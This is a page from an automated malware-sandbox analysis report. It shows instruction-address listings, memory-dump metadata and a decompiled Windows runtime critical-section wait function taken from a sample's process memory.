                                                                                                                              0x1d751fd4
                                                                                                                              0x1d751fd4
                                                                                                                              0x1d751fd7
                                                                                                                              0x1d751fda
                                                                                                                              0x1d751fdc
                                                                                                                              0x1d751fdf
                                                                                                                              0x1d751fe3
                                                                                                                              0x1d7520c0
                                                                                                                              0x1d7520c5
                                                                                                                              0x1d7520c7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5cc0
                                                                                                                              0x1d7a5cc2
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5cc2
                                                                                                                              0x1d751fe9
                                                                                                                              0x1d751fe9
                                                                                                                              0x1d751fec
                                                                                                                              0x1d751fef
                                                                                                                              0x1d75201f
                                                                                                                              0x1d752026
                                                                                                                              0x1d752029
                                                                                                                              0x1d75205a
                                                                                                                              0x1d75205d
                                                                                                                              0x1d75205f
                                                                                                                              0x1d75205f
                                                                                                                              0x1d75205d
                                                                                                                              0x1d752035
                                                                                                                              0x1d75203a
                                                                                                                              0x1d75203d
                                                                                                                              0x1d75203f
                                                                                                                              0x1d752041
                                                                                                                              0x1d752048
                                                                                                                              0x1d75204c
                                                                                                                              0x1d752071
                                                                                                                              0x1d75207a
                                                                                                                              0x1d75204e
                                                                                                                              0x1d75204e
                                                                                                                              0x1d752053
                                                                                                                              0x1d752053
                                                                                                                              0x1d752089
                                                                                                                              0x1d752090
                                                                                                                              0x1d752095
                                                                                                                              0x1d75209b
                                                                                                                              0x1d75209e
                                                                                                                              0x1d7520a2
                                                                                                                              0x1d7520a8
                                                                                                                              0x1d7520af
                                                                                                                              0x1d7520b0
                                                                                                                              0x1d7520b0
                                                                                                                              0x1d7520a2
                                                                                                                              0x1d75203f
                                                                                                                              0x1d751ff1
                                                                                                                              0x1d751ff4
                                                                                                                              0x1d751ff9
                                                                                                                              0x1d751ffd
                                                                                                                              0x1d752001
                                                                                                                              0x1d752006
                                                                                                                              0x1d75200e
                                                                                                                              0x1d752012
                                                                                                                              0x1d751f40
                                                                                                                              0x1d751f46
                                                                                                                              0x1d751f49
                                                                                                                              0x00000000
                                                                                                                              0x1d751f71
                                                                                                                              0x1d7a5ceb
                                                                                                                              0x1d7a5cef
                                                                                                                              0x1d7a5cf4
                                                                                                                              0x1d7a5cfe
                                                                                                                              0x1d7a5d01
                                                                                                                              0x1d7a5d03
                                                                                                                              0x1d7a5d08
                                                                                                                              0x1d7a5d08
                                                                                                                              0x1d7a5d01
                                                                                                                              0x1d7a5d0d
                                                                                                                              0x1d7a5d11
                                                                                                                              0x1d7a5e61
                                                                                                                              0x1d7a5e61
                                                                                                                              0x1d7a5e64
                                                                                                                              0x1d7a5e67
                                                                                                                              0x1d7a5e69
                                                                                                                              0x1d7a5e6c
                                                                                                                              0x1d7a5e6f
                                                                                                                              0x1d7a5e72
                                                                                                                              0x1d7a5e74
                                                                                                                              0x1d7a5cd6
                                                                                                                              0x1d7a5cd6
                                                                                                                              0x1d7a5cd8
                                                                                                                              0x1d7a5cda
                                                                                                                              0x1d7a5cdb
                                                                                                                              0x1d7a5cdc
                                                                                                                              0x1d7a5cde
                                                                                                                              0x1d7a5ce0
                                                                                                                              0x1d7a5ce1
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5ce1
                                                                                                                              0x1d7a5e7a
                                                                                                                              0x1d7a5e7c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5e85
                                                                                                                              0x1d7a5e88
                                                                                                                              0x1d7a5e8e
                                                                                                                              0x1d7a5e90
                                                                                                                              0x1d7a5ebb
                                                                                                                              0x1d7a5ebb
                                                                                                                              0x1d7a5ebe
                                                                                                                              0x1d7a5ec1
                                                                                                                              0x1d7a5ec3
                                                                                                                              0x1d7a5ec6
                                                                                                                              0x1d7a5eca
                                                                                                                              0x1d7a5eed
                                                                                                                              0x1d7a5eed
                                                                                                                              0x1d7a5ef0
                                                                                                                              0x1d7a5ef3
                                                                                                                              0x1d7a5efc
                                                                                                                              0x1d7a5f03
                                                                                                                              0x1d7a5f06
                                                                                                                              0x1d7a5f09
                                                                                                                              0x1d7a5f0b
                                                                                                                              0x1d7a5f0e
                                                                                                                              0x1d7a5f10
                                                                                                                              0x1d7a5f10
                                                                                                                              0x1d7a5f13
                                                                                                                              0x1d7a5f13
                                                                                                                              0x1d7a5f0e
                                                                                                                              0x1d7a5f20
                                                                                                                              0x1d7a5f25
                                                                                                                              0x1d7a5f28
                                                                                                                              0x1d7a5f2b
                                                                                                                              0x1d7a5f2d
                                                                                                                              0x1d7a5f34
                                                                                                                              0x1d7a5f38
                                                                                                                              0x1d7a5f58
                                                                                                                              0x1d7a5f5d
                                                                                                                              0x1d7a5f3a
                                                                                                                              0x1d7a5f50
                                                                                                                              0x1d7a5f55
                                                                                                                              0x1d7a5f6b
                                                                                                                              0x1d7a5f72
                                                                                                                              0x1d7a5f77
                                                                                                                              0x1d7a5f80
                                                                                                                              0x1d7a5f84
                                                                                                                              0x1d7a5f86
                                                                                                                              0x1d7a5f8d
                                                                                                                              0x1d7a5f8e
                                                                                                                              0x1d7a5f8e
                                                                                                                              0x1d7a5f84
                                                                                                                              0x1d7a5f2b
                                                                                                                              0x1d7a5f95
                                                                                                                              0x1d7a5f98
                                                                                                                              0x1d7a5f9c
                                                                                                                              0x1d7a5fa3
                                                                                                                              0x1d7a5fa8
                                                                                                                              0x1d7a5fb4
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5fb4
                                                                                                                              0x1d7a5ed0
                                                                                                                              0x1d7a5ed5
                                                                                                                              0x1d7a5ed7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5ee1
                                                                                                                              0x1d7a5ee3
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5ee3
                                                                                                                              0x1d7a5e92
                                                                                                                              0x1d7a5e9f
                                                                                                                              0x1d7a5e9f
                                                                                                                              0x1d7a5ea2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5e97
                                                                                                                              0x1d7a5e99
                                                                                                                              0x1d7a5e9b
                                                                                                                              0x1d7a5eab
                                                                                                                              0x1d7a5eab
                                                                                                                              0x1d7a5eac
                                                                                                                              0x1d7a5eb6
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5eb6
                                                                                                                              0x1d7a5e9d
                                                                                                                              0x1d7a5e9d
                                                                                                                              0x1d7a5ea4
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d17
                                                                                                                              0x1d7a5d17
                                                                                                                              0x1d7a5d1a
                                                                                                                              0x1d7a5d1d
                                                                                                                              0x1d7a5d1f
                                                                                                                              0x1d7a5d22
                                                                                                                              0x1d7a5d25
                                                                                                                              0x1d7a5d28
                                                                                                                              0x1d7a5d2a
                                                                                                                              0x1d7a5e4d
                                                                                                                              0x1d7a5e4d
                                                                                                                              0x1d7a5e4f
                                                                                                                              0x1d7a5e53
                                                                                                                              0x1d7a5e54
                                                                                                                              0x1d7a5e57
                                                                                                                              0x1d7a5e58
                                                                                                                              0x1d7a5e5d
                                                                                                                              0x1d7a5e5d
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5e5d
                                                                                                                              0x1d7a5d30
                                                                                                                              0x1d7a5d32
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d3b
                                                                                                                              0x1d7a5d3e
                                                                                                                              0x1d7a5d44
                                                                                                                              0x1d7a5d46
                                                                                                                              0x1d7a5d71
                                                                                                                              0x1d7a5d71
                                                                                                                              0x1d7a5d74
                                                                                                                              0x1d7a5d77
                                                                                                                              0x1d7a5d79
                                                                                                                              0x1d7a5d7c
                                                                                                                              0x1d7a5d80
                                                                                                                              0x1d7a5da3
                                                                                                                              0x1d7a5da3
                                                                                                                              0x1d7a5da6
                                                                                                                              0x1d7a5da9
                                                                                                                              0x1d7a5db2
                                                                                                                              0x1d7a5db9
                                                                                                                              0x1d7a5dbc
                                                                                                                              0x1d7a5dbf
                                                                                                                              0x1d7a5dc1
                                                                                                                              0x1d7a5dc4
                                                                                                                              0x1d7a5dc6
                                                                                                                              0x1d7a5dc6
                                                                                                                              0x1d7a5dc9
                                                                                                                              0x1d7a5dc9
                                                                                                                              0x1d7a5dc4
                                                                                                                              0x1d7a5dd6
                                                                                                                              0x1d7a5ddb
                                                                                                                              0x1d7a5dde
                                                                                                                              0x1d7a5de1
                                                                                                                              0x1d7a5de3
                                                                                                                              0x1d7a5dea
                                                                                                                              0x1d7a5dee
                                                                                                                              0x1d7a5e0e
                                                                                                                              0x1d7a5e13
                                                                                                                              0x1d7a5df0
                                                                                                                              0x1d7a5e06
                                                                                                                              0x1d7a5e0b
                                                                                                                              0x1d7a5e21
                                                                                                                              0x1d7a5e28
                                                                                                                              0x1d7a5e2d
                                                                                                                              0x1d7a5e33
                                                                                                                              0x1d7a5e36
                                                                                                                              0x1d7a5e3a
                                                                                                                              0x1d7a5e3c
                                                                                                                              0x1d7a5e43
                                                                                                                              0x1d7a5e44
                                                                                                                              0x1d7a5e44
                                                                                                                              0x1d7a5e3a
                                                                                                                              0x1d7a5de1
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5da9
                                                                                                                              0x1d7a5d86
                                                                                                                              0x1d7a5d8b
                                                                                                                              0x1d7a5d8d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d99
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d99
                                                                                                                              0x1d7a5d48
                                                                                                                              0x1d7a5d55
                                                                                                                              0x1d7a5d55
                                                                                                                              0x1d7a5d58
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d4d
                                                                                                                              0x1d7a5d4f
                                                                                                                              0x1d7a5d51
                                                                                                                              0x1d7a5d61
                                                                                                                              0x1d7a5d61
                                                                                                                              0x1d7a5d62
                                                                                                                              0x1d7a5d6c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d6c
                                                                                                                              0x1d7a5d53
                                                                                                                              0x1d7a5d53
                                                                                                                              0x1d7a5d5a
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5d5a
                                                                                                                              0x1d7a5d11
                                                                                                                              0x1d751f8b
                                                                                                                              0x1d751f8b
                                                                                                                              0x1d751f4b
                                                                                                                              0x1d751f50
                                                                                                                              0x1d751f52
                                                                                                                              0x1d751f57
                                                                                                                              0x1d751f64
                                                                                                                              0x1d751f6b
                                                                                                                              0x1d7a5cce
                                                                                                                              0x1d7a5ccf
                                                                                                                              0x1d7a5cd0
                                                                                                                              0x1d7a5cd1
                                                                                                                              0x1d7a5cd2
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5cd2
                                                                                                                              0x00000000
                                                                                                                              0x1d751faa
                                                                                                                              0x1d751faa
                                                                                                                              0x1d751fad
                                                                                                                              0x1d751fb0
                                                                                                                              0x1d751fb0
                                                                                                                              0x1d751fb3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d751fb5
                                                                                                                              0x1d751fb7
                                                                                                                              0x1d751fb9
                                                                                                                              0x1d751fc5
                                                                                                                              0x1d751fc5
                                                                                                                              0x00000000
                                                                                                                              0x1d751fbb
                                                                                                                              0x1d751fbb
                                                                                                                              0x1d751fbd
                                                                                                                              0x00000000
                                                                                                                              0x1d751fbd
                                                                                                                              0x1d751fb9
                                                                                                                              0x1d751fcf
                                                                                                                              0x00000000
                                                                                                                              0x1d751fcf
                                                                                                                              0x1d751fa8
                                                                                                                              0x1d751f2d
                                                                                                                              0x1d751f2d
                                                                                                                              0x1d751f2f
                                                                                                                              0x1d751f33
                                                                                                                              0x1d751f34
                                                                                                                              0x1d751f37
                                                                                                                              0x1d751f38
                                                                                                                              0x00000000
                                                                                                                              0x1d751f38

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                              • API String ID: 0-3178619729
                                                                                                                              • Opcode ID: 3fca1bbfc0e42c88db90e288e613b1d42391956ee6b6e45ecdbc28687b3be7f6
                                                                                                                              • Instruction ID: 07b33cfa6aa9a474064c6dc29f6b8cb3f528056d57c2abf672809699d4fec14c
                                                                                                                              • Opcode Fuzzy Hash: 3fca1bbfc0e42c88db90e288e613b1d42391956ee6b6e45ecdbc28687b3be7f6
                                                                                                                              • Instruction Fuzzy Hash: E7222174604246EFD705CF28C484B7ABBB5FF05724F19869AE9498B682E731F881CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 70%
                                                                                                                              			E1D76F4D0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char _v72;
				signed int _v76;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed char _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				char _v130;
				intOrPtr _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed char* _t138;
				signed char* _t139;
				signed char* _t140;
				void* _t142;
				signed int _t144;
				signed int _t145;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t191;
				signed char* _t192;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t206;
				unsigned int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t218;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				intOrPtr _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t238;
				signed char _t241;
				void* _t244;
				signed int _t246;
				intOrPtr _t247;
				void* _t251;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t234 = __edx;
				_t209 = __ecx;
				_t254 = (_t252 & 0xfffffff8) - 0x84;
				_v8 =  *0x1d83b370 ^ _t254;
				_t129 =  *[fs:0x18];
				_t241 = __ecx;
				_v112 = __edx;
				_v72 = __ecx;
				_v129 = 0;
				_v64 = _t129;
				_v108 = 0;
				if(__ecx == 0x1d833390) {
					_v129 = 1;
					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
				}
				if( *0x1d835da8 != 0) {
					_push(0xc000004b);
					_push(0xffffffff);
					E1D782C70();
				}
				if( *0x1d835a84 == 0) {
					_v120 = 0x1d835a88;
				} else {
					_v120 = 0;
				}
				_t246 = _t241 + 0x10;
				if( *(_t241 + 0x10) == 0) {
					_t210 = _t209 | 0xffffffff;
					__eflags =  *0x1d834ae2;
					_v124 = _t210;
					if( *0x1d834ae2 != 0) {
						_push(0);
						_push(1);
						_push(0);
						_push(0x100003);
						_push( &_v124);
						_t132 = E1D782E30();
						__eflags = _t132;
						if(_t132 >= 0) {
							_t211 = _v124;
						} else {
							_t211 = _t210 | 0xffffffff;
							_v124 = _t210 | 0xffffffff;
						}
					}
					asm("lock cmpxchg [esi], ecx");
					__eflags = 0;
					if(0 != 0) {
						_t198 = _v124;
						__eflags = _t198 - 0xffffffff;
						if(_t198 != 0xffffffff) {
							_push(_t198);
							E1D782A80();
						}
					}
				}
				_t134 =  *_t241;
				if(_t134 == 0xffffffff) {
					_t134 = _t134 | 0xffffffff;
					__eflags =  *(_t241 + 0x14) & 0x01000000;
					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
						_t211 = _t241;
						E1D76FCE0(_t241, _t234);
						_t134 =  *_t241;
					}
				}
				_v104 = 0;
				if(_t134 != 0xffffffff) {
					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
				}
				_t201 =  *_t246;
				_v68 = _t201;
				L9:
				while(1) {
					L9:
					if(E1D753C40() != 0) {
						_t138 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t138 = 0x7ffe0382;
					}
					if( *_t138 != 0) {
						_t139 =  *[fs:0x30];
						__eflags = _t139[0x240] & 0x00000002;
						if((_t139[0x240] & 0x00000002) != 0) {
							_v16 = _t241;
							_v54 = 0x1722;
							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
							_v28 =  *(_t241 + 4);
							_v20 =  *((intOrPtr*)(_t241 + 0xc));
							_t191 = ( *[fs:0x30])[0x50];
							__eflags = _t191;
							if(_t191 == 0) {
								L61:
								_t192 = 0x7ffe0382;
							} else {
								__eflags =  *_t191;
								if( *_t191 == 0) {
									goto L61;
								} else {
									_t192 = ( *[fs:0x30])[0x50] + 0x228;
								}
							}
							_t211 =  &_v60;
							_push( &_v60);
							_push(0x10);
							_push(0x20402);
							_push( *_t192 & 0x000000ff);
							E1D782F90();
						}
						goto L12;
						L24:
						if(_t140 < 0) {
							E1D798AA0(_t211, _t234, _t140);
							asm("int3");
							__eflags = _t246 != 4;
							if(_t246 != 4) {
								L47:
								E1D76F946(_v132,  &_v124);
								_t152 = 0;
							} else {
								_t238 =  *(_t241 + 4);
								_t153 =  *_t241;
								asm("lock cmpxchg8b [esi]");
								__eflags = _t153 -  *_t241;
								if(_t153 !=  *_t241) {
									goto L47;
								} else {
									__eflags = _t238 -  *(_t241 + 4);
									if(__eflags != 0) {
										goto L47;
									} else {
										_t152 = L1D76F8A5(_v132,  &_v124, _a8, _a12);
									}
								}
							}
							return _t152;
						} else {
							if(_v129 != 0) {
								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
								_t156 = ( *[fs:0x30])[0x50];
								__eflags = _t156;
								if(_t156 == 0) {
									L81:
									_t140 = 0x7ffe0384;
								} else {
									__eflags =  *_t156;
									if( *_t156 == 0) {
										goto L81;
									} else {
										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
									}
								}
								__eflags =  *_t140;
								if( *_t140 != 0) {
									_t140 =  *[fs:0x30];
									__eflags = _t140[0x240] & 0x00000004;
									if((_t140[0x240] & 0x00000004) != 0) {
										_t159 = ( *[fs:0x30])[0x50];
										__eflags = _t159;
										if(_t159 == 0) {
											L87:
											_t140 = 0x7ffe0385;
										} else {
											__eflags =  *_t159;
											if( *_t159 == 0) {
												goto L87;
											} else {
												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
											}
										}
										__eflags =  *_t140 & 0x00000020;
										if(( *_t140 & 0x00000020) != 0) {
											_t140 = E1D7C0227(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
										}
									}
								}
							}
							_pop(_t244);
							_pop(_t251);
							_pop(_t206);
							return E1D784B50(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
						}
					}
					L12:
					if(_t201 != 0xffffffff) {
						_push(_v120);
						_push(0);
						_push(_t201);
						_t140 = E1D7829D0();
					} else {
						_t207 = _t241 + 4;
						_v76 =  &_v100 & 0xfffffffc;
						do {
							_t218 =  *[fs:0x18];
							_v100 = _t207;
							_v80 = 1;
							_v88 = 0;
							_v92 = 0;
							_v84 = 0;
							_v96 =  *((intOrPtr*)(_t218 + 0x24));
							_t208 = _v76;
							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
							_t169 = _t207 >> 0x00000005 & 0x0000007f;
							_v116 = _t220;
							_t235 =  *(_t220 + _t169 * 4);
							_v128 = _t220 + _t169 * 4;
							while(1) {
								_t172 = _t235 & 0xfffffffc;
								_t223 = _t235 & 0x00000003 | _t208;
								_v92 = _t172;
								if(_t172 != 0) {
									_v84 = 0;
									_t223 = _t223 | 0x00000002;
								} else {
									_v84 =  &_v100;
								}
								_t246 = _t223;
								_t173 = _t235;
								asm("lock cmpxchg [edi], esi");
								if(_t173 == _t235) {
									break;
								}
								_t235 = _t173;
							}
							_t241 = _v72;
							_t207 = _t241 + 4;
							if(((_t223 ^ _t235) & 0x00000002) != 0) {
								_t246 = _v128;
								_t236 =  *_t246;
								while(1) {
									_t226 = _t236 & 0xfffffffc;
									__eflags =  *(_t226 + 0x10);
									_v128 = _t226 + 0x10;
									if( *(_t226 + 0x10) == 0) {
										goto L31;
									}
									do {
										L31:
										_t183 = _t226;
										_t226 =  *(_t226 + 8);
										 *(_t226 + 0xc) = _t183;
										__eflags =  *(_t226 + 0x10);
									} while ( *(_t226 + 0x10) == 0);
									L32:
									 *_v128 =  *(_t226 + 0x10);
									__eflags = _t236 & 0x00000001;
									if((_t236 & 0x00000001) != 0) {
										_v130 = 1;
									} else {
										_v130 = 0;
										__eflags = _t236 & 0xfffffffc;
									}
									_t176 = _t236;
									asm("lock cmpxchg [esi], ecx");
									__eflags = _t176 - _t236;
									if(_t176 != _t236) {
										_t236 = _t176;
										_t226 = _t236 & 0xfffffffc;
										__eflags =  *(_t226 + 0x10);
										_v128 = _t226 + 0x10;
										if( *(_t226 + 0x10) == 0) {
											goto L31;
										}
										goto L32;
									}
									__eflags = _v130;
									if(_v130 != 0) {
										_t179 = _t176 & 0xfffffffc;
										__eflags = _t179;
										_v128 = _t179;
										if(_t179 != 0) {
											do {
												_t246 =  *(_t179 + 8);
												_t180 = _t179 + 0x14;
												 *_t180 = 2;
												__eflags =  *_t180;
												if( *_t180 == 0) {
													_push( *((intOrPtr*)(_v128 + 4)));
													E1D7830B0();
												}
												_t179 = _t246;
												_v128 = _t179;
												__eflags = _t246;
											} while (_t246 != 0);
										}
									}
									goto L19;
								}
							}
							L19:
							_t234 =  &_v100;
							_t229 = _v116;
							if( *_t207 != _v112) {
								E1D76F946(_t229, _t234);
								_t140 = 0;
							} else {
								_t140 = L1D76F8A5(_t229, _t234, _v120, 0);
							}
							if(_t140 == 0x102) {
								L70:
								_t202 = _v108;
								_t247 =  *[fs:0x18];
								_push(_t202);
								_t142 = E1D786310( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
								_push(_t234);
								E1D7CEF10(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
								_t144 =  *_t241;
								_t255 = _t254 + 0x18;
								__eflags = _t144 - 0xffffffff;
								if(_t144 == 0xffffffff) {
									_t145 = 0;
									__eflags = 0;
								} else {
									_t145 =  *((intOrPtr*)(_t144 + 0x14));
								}
								_push(_t145);
								_push(_t241);
								_push( *((intOrPtr*)(_t241 + 0xc)));
								_push( *((intOrPtr*)(_t247 + 0x24)));
								E1D7CEF10(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
								_t256 = _t255 + 0x20;
								_t203 = _t202 + 1;
								_t211 = _t241;
								_v108 = _t203;
								_t246 = E1D7DA9AE(_t241);
								__eflags = _t203 - 2;
								if(_t203 > 2) {
									__eflags = _t241 - 0x1d833390;
									if(_t241 != 0x1d833390) {
										__eflags = _t246 - _v104;
										if(_t246 == _v104) {
											E1D7DAB5E(_t211);
										}
									}
								}
								_push("RTL: Re-Waiting\n");
								_push(0);
								_push(0x65);
								_v104 = _t246;
								E1D7CEF10();
								_t201 = _v68;
								_t254 = _t256 + 0xc;
								goto L9;
							} else {
								goto L22;
							}
							goto L23;
							L22:
							_t211 =  *_t207;
							_v112 = _t211;
						} while ((_t211 & 0x00000002) != 0);
					}
					L23:
					if(_t140 == 0x102) {
						goto L70;
					}
					goto L24;
				}
			}



















































































                                                                                                                              0x1d76f4d0
                                                                                                                              0x1d76f4d0
                                                                                                                              0x1d76f4d8
                                                                                                                              0x1d76f4e5
                                                                                                                              0x1d76f4ec
                                                                                                                              0x1d76f4f5
                                                                                                                              0x1d76f4f7
                                                                                                                              0x1d76f4fb
                                                                                                                              0x1d76f4ff
                                                                                                                              0x1d76f504
                                                                                                                              0x1d76f508
                                                                                                                              0x1d76f516
                                                                                                                              0x1d7aff46
                                                                                                                              0x1d7aff4b
                                                                                                                              0x1d7aff4b
                                                                                                                              0x1d76f523
                                                                                                                              0x1d7aff5a
                                                                                                                              0x1d7aff5f
                                                                                                                              0x1d7aff61
                                                                                                                              0x1d7aff61
                                                                                                                              0x1d76f530
                                                                                                                              0x1d7aff6b
                                                                                                                              0x1d76f536
                                                                                                                              0x1d76f536
                                                                                                                              0x1d76f536
                                                                                                                              0x1d76f542
                                                                                                                              0x1d76f545
                                                                                                                              0x1d76f722
                                                                                                                              0x1d76f725
                                                                                                                              0x1d76f72c
                                                                                                                              0x1d76f730
                                                                                                                              0x1d7aff78
                                                                                                                              0x1d7aff7a
                                                                                                                              0x1d7aff7c
                                                                                                                              0x1d7aff7e
                                                                                                                              0x1d7aff87
                                                                                                                              0x1d7aff88
                                                                                                                              0x1d7aff8d
                                                                                                                              0x1d7aff8f
                                                                                                                              0x1d7aff9d
                                                                                                                              0x1d7aff91
                                                                                                                              0x1d7aff91
                                                                                                                              0x1d7aff94
                                                                                                                              0x1d7aff94
                                                                                                                              0x1d7aff8f
                                                                                                                              0x1d76f738
                                                                                                                              0x1d76f73c
                                                                                                                              0x1d76f73e
                                                                                                                              0x1d7affa6
                                                                                                                              0x1d7affaa
                                                                                                                              0x1d7affad
                                                                                                                              0x1d7affb3
                                                                                                                              0x1d7affb4
                                                                                                                              0x1d7affb4
                                                                                                                              0x1d7affad
                                                                                                                              0x1d76f73e
                                                                                                                              0x1d76f54b
                                                                                                                              0x1d76f550
                                                                                                                              0x1d76f749
                                                                                                                              0x1d76f74c
                                                                                                                              0x1d76f753
                                                                                                                              0x1d76f759
                                                                                                                              0x1d76f75b
                                                                                                                              0x1d76f760
                                                                                                                              0x1d76f760
                                                                                                                              0x1d76f753
                                                                                                                              0x1d76f556
                                                                                                                              0x1d76f561
                                                                                                                              0x1d76f563
                                                                                                                              0x1d76f563
                                                                                                                              0x1d76f566
                                                                                                                              0x1d76f568
                                                                                                                              0x00000000
                                                                                                                              0x1d76f570
                                                                                                                              0x1d76f570
                                                                                                                              0x1d76f577
                                                                                                                              0x1d7affc7
                                                                                                                              0x1d76f57d
                                                                                                                              0x1d76f57d
                                                                                                                              0x1d76f57d
                                                                                                                              0x1d76f585
                                                                                                                              0x1d7affd1
                                                                                                                              0x1d7affd7
                                                                                                                              0x1d7affde
                                                                                                                              0x1d7affe9
                                                                                                                              0x1d7afff0
                                                                                                                              0x1d7afffd
                                                                                                                              0x1d7b0004
                                                                                                                              0x1d7b000b
                                                                                                                              0x1d7b0018
                                                                                                                              0x1d7b001b
                                                                                                                              0x1d7b001d
                                                                                                                              0x1d7b0034
                                                                                                                              0x1d7b0034
                                                                                                                              0x1d7b001f
                                                                                                                              0x1d7b001f
                                                                                                                              0x1d7b0022
                                                                                                                              0x00000000
                                                                                                                              0x1d7b0024
                                                                                                                              0x1d7b002d
                                                                                                                              0x1d7b002d
                                                                                                                              0x1d7b0022
                                                                                                                              0x1d7b003c
                                                                                                                              0x1d7b0040
                                                                                                                              0x1d7b0041
                                                                                                                              0x1d7b0043
                                                                                                                              0x1d7b0048
                                                                                                                              0x1d7b0049
                                                                                                                              0x1d7b0049
                                                                                                                              0x00000000
                                                                                                                              0x1d76f682
                                                                                                                              0x1d76f684
                                                                                                                              0x1d7b01e2
                                                                                                                              0x1d7b01e7
                                                                                                                              0x1d7b01e8
                                                                                                                              0x1d7b01eb
                                                                                                                              0x1d76f825
                                                                                                                              0x1d76f82d
                                                                                                                              0x1d76f832
                                                                                                                              0x1d7b01f1
                                                                                                                              0x1d7b01f4
                                                                                                                              0x1d7b01f6
                                                                                                                              0x1d7b01ff
                                                                                                                              0x1d7b0203
                                                                                                                              0x1d7b0205
                                                                                                                              0x00000000
                                                                                                                              0x1d7b020b
                                                                                                                              0x1d7b020b
                                                                                                                              0x1d76f807
                                                                                                                              0x00000000
                                                                                                                              0x1d76f809
                                                                                                                              0x1d76f817
                                                                                                                              0x1d76f817
                                                                                                                              0x1d76f807
                                                                                                                              0x1d7b0205
                                                                                                                              0x1d76f822
                                                                                                                              0x1d76f68a
                                                                                                                              0x1d76f68f
                                                                                                                              0x1d7b014a
                                                                                                                              0x1d7b015a
                                                                                                                              0x1d7b015d
                                                                                                                              0x1d7b015f
                                                                                                                              0x1d7b0176
                                                                                                                              0x1d7b0176
                                                                                                                              0x1d7b0161
                                                                                                                              0x1d7b0161
                                                                                                                              0x1d7b0164
                                                                                                                              0x00000000
                                                                                                                              0x1d7b0166
                                                                                                                              0x1d7b016f
                                                                                                                              0x1d7b016f
                                                                                                                              0x1d7b0164
                                                                                                                              0x1d7b017b
                                                                                                                              0x1d7b017e
                                                                                                                              0x1d7b0184
                                                                                                                              0x1d7b018a
                                                                                                                              0x1d7b0191
                                                                                                                              0x1d7b019d
                                                                                                                              0x1d7b01a0
                                                                                                                              0x1d7b01a2
                                                                                                                              0x1d7b01b9
                                                                                                                              0x1d7b01b9
                                                                                                                              0x1d7b01a4
                                                                                                                              0x1d7b01a4
